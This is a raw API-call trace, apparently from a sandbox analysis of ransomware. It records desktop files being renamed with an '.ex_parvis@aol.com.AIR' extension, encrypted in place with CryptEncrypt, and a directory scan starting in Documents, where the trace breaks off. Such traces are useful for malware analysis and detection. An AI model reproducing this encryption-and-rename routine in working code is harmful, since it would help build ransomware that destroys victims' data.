	[0099.802] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.802] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.802] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0099.802] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 50
	[0099.802] GetProcessHeap () returned 0x540000
	[0099.802] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xca) returned 0x59d258
	[0099.802] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini"
	[0099.802] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.802] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.805] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.805] GetProcessHeap () returned 0x540000
	[0099.805] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0099.805] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=282) returned 1
	[0099.805] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x11a
	[0099.805] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.805] GetProcessHeap () returned 0x540000
	[0099.805] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.805] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.805] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.806] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.806] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.806] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x11a) returned 0x57fb28
	[0099.806] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x11a) returned 0x579cd8
	[0099.806] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.806] ReadFile (in: hFile=0x384, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x11a, lpOverlapped=0x0) returned 1
	[0099.806] SetFilePointer (in: hFile=0x384, lDistanceToMove=-282, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.807] WriteFile (in: hFile=0x384, lpBuffer=0x579cd8*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x579cd8*, lpNumberOfBytesWritten=0x3a1f778*=0x11a, lpOverlapped=0x0) returned 1
	[0099.807] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.807] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.807] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b35j2h6zurxQ.mkv", dwFileAttributes=0x80) returned 1
	[0099.807] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b35j2h6zurxQ.mkv") returned 55
	[0099.807] GetProcessHeap () returned 0x540000
	[0099.807] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4) returned 0x57fb28
	[0099.807] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b35j2h6zurxQ.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b35j2h6zurxQ.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b35j2h6zurxQ.mkv"
	[0099.807] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b35j2h6zurxQ.mkv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b35j2h6zurxQ.mkv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b35j2h6zurxQ.mkv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.807] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b35j2h6zurxQ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b35j2h6zurxq.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b35j2h6zurxQ.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b35j2h6zurxq.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.809] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b35j2h6zurxQ.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b35j2h6zurxq.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.809] GetProcessHeap () returned 0x540000
	[0099.809] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0099.809] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=74179) returned 1
	[0099.809] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x121c3
	[0099.809] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.810] GetProcessHeap () returned 0x540000
	[0099.810] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.810] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.810] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.810] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.811] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.811] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x121c3) returned 0x5ffbb8
	[0099.811] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x121c3) returned 0x3790048
	[0099.811] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.811] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x121c3, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x121c3, lpOverlapped=0x0) returned 1
	[0099.811] SetFilePointer (in: hFile=0x384, lDistanceToMove=-74179, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.811] WriteFile (in: hFile=0x384, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0x121c3, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0x121c3, lpOverlapped=0x0) returned 1
	[0099.812] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.812] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.812] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6AvS1QjHN9JCOKgT2I3.m4a", dwFileAttributes=0x80) returned 1
	[0099.812] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6AvS1QjHN9JCOKgT2I3.m4a") returned 62
	[0099.812] GetProcessHeap () returned 0x540000
	[0099.812] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe2) returned 0x598b60
	[0099.812] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6AvS1QjHN9JCOKgT2I3.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6AvS1QjHN9JCOKgT2I3.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6AvS1QjHN9JCOKgT2I3.m4a"
	[0099.812] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6AvS1QjHN9JCOKgT2I3.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6AvS1QjHN9JCOKgT2I3.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6AvS1QjHN9JCOKgT2I3.m4a.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.812] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6AvS1QjHN9JCOKgT2I3.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6avs1qjhn9jcokgt2i3.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6AvS1QjHN9JCOKgT2I3.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6avs1qjhn9jcokgt2i3.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.815] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6AvS1QjHN9JCOKgT2I3.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6avs1qjhn9jcokgt2i3.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.815] GetProcessHeap () returned 0x540000
	[0099.815] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.815] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=7904) returned 1
	[0099.815] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1ee0
	[0099.815] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.815] GetProcessHeap () returned 0x540000
	[0099.815] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.815] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.815] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.816] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.816] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.816] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1ee0) returned 0x5ffbb8
	[0099.816] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1ee0) returned 0x601aa0
	[0099.816] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.816] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x1ee0, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x1ee0, lpOverlapped=0x0) returned 1
	[0099.817] SetFilePointer (in: hFile=0x384, lDistanceToMove=-7904, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.817] WriteFile (in: hFile=0x384, lpBuffer=0x601aa0*, nNumberOfBytesToWrite=0x1ee0, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601aa0*, lpNumberOfBytesWritten=0x3a1f778*=0x1ee0, lpOverlapped=0x0) returned 1
	[0099.817] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.817] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.817] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\62H32YjLe.odt", dwFileAttributes=0x80) returned 1
	[0099.817] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\62H32YjLe.odt") returned 52
	[0099.817] GetProcessHeap () returned 0x540000
	[0099.817] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xce) returned 0x59d258
	[0099.817] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\62H32YjLe.odt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\62H32YjLe.odt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\62H32YjLe.odt"
	[0099.817] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\62H32YjLe.odt", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\62H32YjLe.odt.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\62H32YjLe.odt.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.817] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\62H32YjLe.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\62h32yjle.odt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\62H32YjLe.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\62h32yjle.odt.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.820] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\62H32YjLe.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\62h32yjle.odt.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.820] GetProcessHeap () returned 0x540000
	[0099.820] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0099.820] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=8952) returned 1
	[0099.820] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x22f8
	[0099.820] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.820] GetProcessHeap () returned 0x540000
	[0099.820] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.820] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.820] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.821] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.821] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.821] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x22f8) returned 0x5ffbb8
	[0099.821] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x22f8) returned 0x601eb8
	[0099.821] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.821] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x22f8, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x22f8, lpOverlapped=0x0) returned 1
	[0099.821] SetFilePointer (in: hFile=0x384, lDistanceToMove=-8952, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.821] WriteFile (in: hFile=0x384, lpBuffer=0x601eb8*, nNumberOfBytesToWrite=0x22f8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601eb8*, lpNumberOfBytesWritten=0x3a1f778*=0x22f8, lpOverlapped=0x0) returned 1
	[0099.822] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.822] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.822] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe", dwFileAttributes=0x80) returned 1
	[0099.822] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 44
	[0099.822] GetProcessHeap () returned 0x540000
	[0099.822] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xbe) returned 0x598b60
	[0099.822] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe"
	[0099.822] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.822] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3.exe"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.824] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0099.825] GetProcessHeap () returned 0x540000
	[0099.826] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.826] CloseHandle (hObject=0xffffffff) returned 0
	[0099.826] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da530
	[0099.826] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0099.826] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9af17a0, ftCreationTime.dwHighDateTime=0x1d52fe1, ftLastAccessTime.dwLowDateTime=0xdaee18c0, ftLastAccessTime.dwHighDateTime=0x1d55e96, ftLastWriteTime.dwLowDateTime=0xdaee18c0, ftLastWriteTime.dwHighDateTime=0x1d55e96, nFileSizeHigh=0x0, nFileSizeLow=0xa4ca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-HipEppITXm4.xlsx", cAlternateFileName="-HIPEP~1.XLS")) returned 1
